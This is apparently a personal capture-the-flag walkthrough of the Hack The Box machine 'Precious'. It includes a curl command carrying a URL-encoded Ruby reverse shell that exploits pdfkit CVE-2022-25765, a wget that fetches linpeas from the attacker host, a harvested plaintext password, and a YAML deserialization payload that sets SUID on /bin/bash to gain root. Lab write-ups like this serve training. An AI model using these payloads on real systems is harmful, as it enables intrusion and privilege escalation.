Precious
TARGET IP: 10.10.11.189
HOST IP: 10.10.16.10
Recon
NMAP
nmap [Target IP]
nmap -A -p 22,80 [Target IP]
HTTP
First start by adding the URL to the associated target IP Address by adding it to the hosts file.
echo "[TARGET IP] precious.htb" | sudo tee -a /etc/hosts
I tried adding a URL to see what happens but it looks like it does not have web access to view page.
I tried http://precious.htb/ and that still didn't work.
It does look like it will return credentials back depending on what you put in.
Enumeration
Gobuster
gobuster dir -u http://precious.htb/ -w /usr/share/dirb/wordlists/common.txt
Exploit
It looks like none of my notes from last night got saved for some stupid fucking reason. I need to learn how to better use this fucking site or this is going to drive me fucking nuts.
Long story but I created different file extension payloads. It seems like the machine filters out
.phpand.rbfile extensions and will make a pdf file of any other file type I load into it.I did this by starting up a python web server on my host machine and plugging the URL into the input box on the web server and opening up a netcat listener to see if I could get something to stick.
I'm still not positive on the backend code being used but am making the assumption that it is either php or ruby.
JAVA
I started trying out java reverse shells and got something interesting when I used a java one liner with the file extension
.xml.
PDF
I finally downloaded one of the pdfs that I created and opened it in exiftool to take a look at the properties.
exiftool [PDF File Path]
It looks like the Creator's name is
pdfkit V0.8.6Let's go take a look at how I can possibly exploit this.
CVE-2022-25765
Looks like this tool has a vulnerability that allows for Command Injection. Let's see if we can exploit this.
Set up a netcat listener
nc -lvnp 4444I found a tool on
Githubthat uses a curl command and forms a reverse shell that exploits the vulnerability.
curl '[TARGET URL]' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: [TARGET URL]' -H 'Connection: keep-alive' -H 'Referer: [TARGET URL]' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F[HOST IP]%3A[HOST PORT]%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22[HOST IP]%22%2C[HOST PORT]%29%29%27%60'The data being sent is a URL-encoded Ruby reverse shell that connects back to the netcat listener I have set up.
Let's get a more interactive shell to work with.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
^ZOn host machine, reopen the terminal and ignore the echo.
stty raw -echo; fg
Let's go look for the user flag.
find / -name user.txt 2>/dev/null
Looks like the file is unreadable due to permissions. Let's see what we can do about that.
I now know we have at least 3 users on the system:
henry
ruby
root
We can confirm this in the
/ect/passwdfile.
I tired
sudo -lbut needed a password to use it. I also spent some time digging around to try find some other useful information. In the end, I went ahead and uploaded linpeas and ran that to see what was available.I used the same python web server I already had running.
wget http://[HOST IP]:8000/linpeas.sh
./linpeas.sh
I wasn't getting anywhere there so I started browsing around a bit more. in the directory
/home/ruby/.bundle/configI found some juicy info.
Looks like possible credentials for henry.
henry:Q3c1AqGHtoI0aXAYFHI'll now SSH into the machine with henry's credentials and it works.
ssh henry@[Target IP]
Now let's get that user file.
0d534cd692f6860abfeb9af4ba3c4e92Next step is to see what priveleges I have as Henry.
sudo -l
We have sudo privileges to run the
update/dependencies.rbfile. If we cat that file we can see that it calls back to adependencies.ymlfile.
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'
# TODO: update versions automatically
def update_gems()
end
def list_from_file
YAML.load(File.read("dependencies.yml"))
end
def list_local_gems
Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end
gems_file = list_from_file
gems_local = list_local_gems
gems_file.each do |file_name, file_version|
gems_local.each do |local_name, local_version|
if(file_name == local_name)
if(file_version != local_version)
puts "Installed version differs from the one specified in file: " + local_name
else
puts "Installed version is equals to the one specified in file: " + local_name
end
end
end
end
With this information, we should be able to craft a new
dependencies.ymlfile with malicious code that it will call back to as sudo.In the
/home/henrydirectory we will create a newdependencies.ymlfile and use this code snippet I got online.
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "chmod +s /bin/bash"
method_id: :resolveYou'll notice that the
git_setis set tochmod +s /bin/bash.This sets SUID to the that file which means we should be able to exploit it and escalate out privileges.
In the same directory that you created the
dependencies.ymlfile, run the following:
sudo /usr/bin/ruby /opt/update_dependencies.rbThis will execute file and end up changing the
/bin/bashfile privileges.After this is done, we can use a privilege escalation technique from GTFOBins to escalate our privileges.
/bin/bash -pCheck to see who are with
whoamiand you should now be root.
cat /root/root.txt
7090f28f7bc0ffc0a8b3203bd45ff6acLast updated